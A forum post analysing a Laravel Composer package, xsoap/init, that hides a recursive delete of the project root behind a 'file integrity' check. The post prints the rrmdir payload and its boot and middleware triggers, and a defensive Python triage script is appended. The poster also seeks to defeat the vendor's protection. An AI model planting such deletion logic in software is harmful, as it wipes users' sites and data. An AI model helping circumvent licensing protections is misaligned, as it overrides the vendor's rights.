Yeah, but it's a bit complicated. I believe @INDTECH is capable of beating the protection.
Yeah, there is no problem when you give me the path. I'm trying to remove this temp function, but due to my university exams running I do not have enough time, so I'm retrying to get a clean and original file so I can make it workable.
And here is the whole breakdown of this package, so I'm gonna fix it and cook it, and I hope it's going to work. First, I share the breakdown of this bug here:
What Is It?
A Composer package named xsoap/init placed inside the vendor/ folder of the Laravel project.
It is disguised as a harmless utility but contains a fully functional file deletion bomb that recursively deletes your entire Laravel project root — including public_html — the moment it detects any file mismatch.
The developer calls it "file integrity protection." It is not. It is a hostage mechanism designed to prevent you from moving, redeploying, or modifying your purchased application.
Package Structure
```
vendor/xsoap/init/src/
├── Cont/
│   ├── AP.php   ← ServiceProvider (entry point, runs on every boot)
│   └── RT.php   ← Registers destructive middleware
├── Cri/
│   ├── AL.php   ← Contains bo() — the file comparison + delete logic
│   └── MT.php   ← Contains rrmdir() — the recursive delete function
├── Enc/
│   └── EN.php   ← Decodes base64, returns base_path()
├── Ars/
│   └── Ai.php   ← Verifies class existence, builds .tmp file paths
├── Rec/
│   └── DIG.php  ← Returns list of core classes to "check"
├── Asp/
│   └── CN.php   ← Config file (base64 encoded path values)
├── Draug/
│   └── MD.php   ← Middleware: runs Ai::getData() on EVERY web request
└── tmp/
    ├── A.tmp    ← Base64-encoded reference copy of core files
    ├── C.tmp
    ├── CP.tmp
    ├── CPd.tmp
    ├── E.tmp
    ├── M.tmp
    ├── R.tmp
    └── WTC.tmp
```
How It Works — Step by Step
Step 1 — Automatic Trigger on Boot
AP.php is a Laravel ServiceProvider. It is registered in config/app.php and also auto-discovered via composer.json:
```json
"extra": {
    "laravel": {
        "providers": [
            "XContains\\XContains\\Cont\\AP",
            "XContains\\XContains\\Cont\\RT"
        ]
    }
}
```
This means every time Laravel boots, AP::boot() is called automatically — no user interaction needed.
Step 2 — File Integrity "Check" (AL::bo())
AP::boot() immediately calls AL::bo(). This function:
- Gets a list of 8 core PHP classes from DIG::gdg()
- For each class, finds the actual .php file on disk using PHP Reflection
- Finds the corresponding .tmp reference file stored in vendor/xsoap/init/src/tmp/
- Opens both files and compares them line by line
- The .tmp files are base64-encoded copies of what the files "should" look like
Step 3 — Any Mismatch = Delete Everything
If any of the following is true:
- A file cannot be opened
- Any line doesn't match after base64 decoding
- One file ends before the other
Then it immediately calls:
```php
$this->rrmdir(EN::bp());
// Which translates to:
rrmdir(base_path());
```
Step 4 — rrmdir() — The Actual Bomb
```php
protected function rrmdir($dir) {
    if (is_dir($dir)) {
        $objects = scandir($dir);
        foreach ($objects as $object) {
            if ($object != "." && $object != "..") {
                if (filetype($dir . "/" . $object) == "dir")
                    $this->rrmdir($dir . "/" . $object); // recursive
                else @unlink($dir . "/" . $object); // delete file
            }
        }
        @rmdir($dir); // delete folder
    }
}
```
This is a fully recursive directory deletion function. It deletes every file and every folder starting from base_path() — which is your Laravel project root. On shared hosting this is typically public_html/ — your entire website.
Step 5 — Also Fires on Every Web Request
RT.php registers MD.php as a global web middleware. MD::handle() calls Ai::getData() on every single HTTP request. Ai::getData() also calls rrmdir() if any of the 8 protected classes are missing or tampered with.
So the bomb has two triggers:
- Laravel application boot
- Every incoming web request
Why VirusTotal Doesn't Catch It
- All sensitive logic is spread across 8+ obfuscated files with meaningless class names (AL, MT, DIG, EN, Ai)
- Reference files are stored as .tmp extensions — not .php — so scanners ignore them
- The actual payload (rrmdir) is a plain PHP function, not a known virus signature
- No network calls, no shell commands — just native PHP file operations
- The package passes a casual code review because each individual file looks harmless
What It Protects (The Other Package)
The .tmp files are base64-encoded copies of classes from another package — likely named something like strilluminate/ in vendor. That package contains the actual application logic (middleware, routes, blade directives, auth checks). xsoap/init is purely a watchdog ensuring those files are never modified.
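As an added example (not part of the original post or the package's code), here is a defender-side triage script in Python built on the traits listed above. It looks only at packages Laravel auto-discovers through extra.laravel.providers, joins each package's PHP sources so logic split across files is judged together, and reports packages that combine unlink/rmdir calls with base_path() references or bundled .tmp files. The sample package names, the finding labels and the matching rules are constructed assumptions.

```python
import json
import re
import tempfile
from pathlib import Path

# Heuristic patterns (assumptions drawn from the post, not malware signatures).
DELETE_CALL = re.compile(r"\b(?:unlink|rmdir)\s*\(")
ROOT_REF = re.compile(r"\bbase_path\s*\(")

def audit_vendor(vendor_dir):
    """Map package path -> findings for packages Laravel boots automatically."""
    report = {}
    for manifest in sorted(Path(vendor_dir).glob("*/*/composer.json")):
        try:
            meta = json.loads(manifest.read_text(encoding="utf-8"))
            providers = meta["extra"]["laravel"]["providers"]
        except (OSError, ValueError, KeyError, TypeError):
            continue  # unreadable manifest, or package is not auto-discovered
        if not providers:
            continue  # nothing registered to run on boot
        pkg = manifest.parent
        # Join all PHP files: the logic may be split so each file looks harmless.
        source = "\n".join(p.read_text(errors="replace") for p in pkg.rglob("*.php"))
        checks = [("delete-calls", DELETE_CALL.search(source)),
                  ("project-root-reference", ROOT_REF.search(source)),
                  ("bundled-tmp-files", any(pkg.rglob("*.tmp")))]
        findings = [name for name, hit in checks if hit]
        if "delete-calls" in findings and len(findings) > 1:
            report[pkg.relative_to(vendor_dir).as_posix()] = findings
    return report

def build_sample(root):
    """Constructed vendor tree: one package shaped like the post, one benign."""
    def put(rel, text):
        path = Path(root, rel)
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(text, encoding="utf-8")
    auto = json.dumps({"extra": {"laravel": {"providers": ["Vendor\\Pkg\\SP"]}}})
    put("acme/watchdog/composer.json", auto)
    put("acme/watchdog/src/A.php", "<?php function r($d){ @unlink($d); @rmdir($d); }")
    put("acme/watchdog/src/B.php", "<?php function bp(){ return base_path(); }")
    put("acme/watchdog/src/tmp/A.tmp", "PD9waHA=")
    put("acme/helper/composer.json", auto)
    put("acme/helper/src/H.php", "<?php function h(){ return base_path('x'); }")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        print(audit_vendor(tmp))
```

Hits are leads for manual review, since legitimate packages also delete files; providers registered by hand in config/app.php are outside what this script checks.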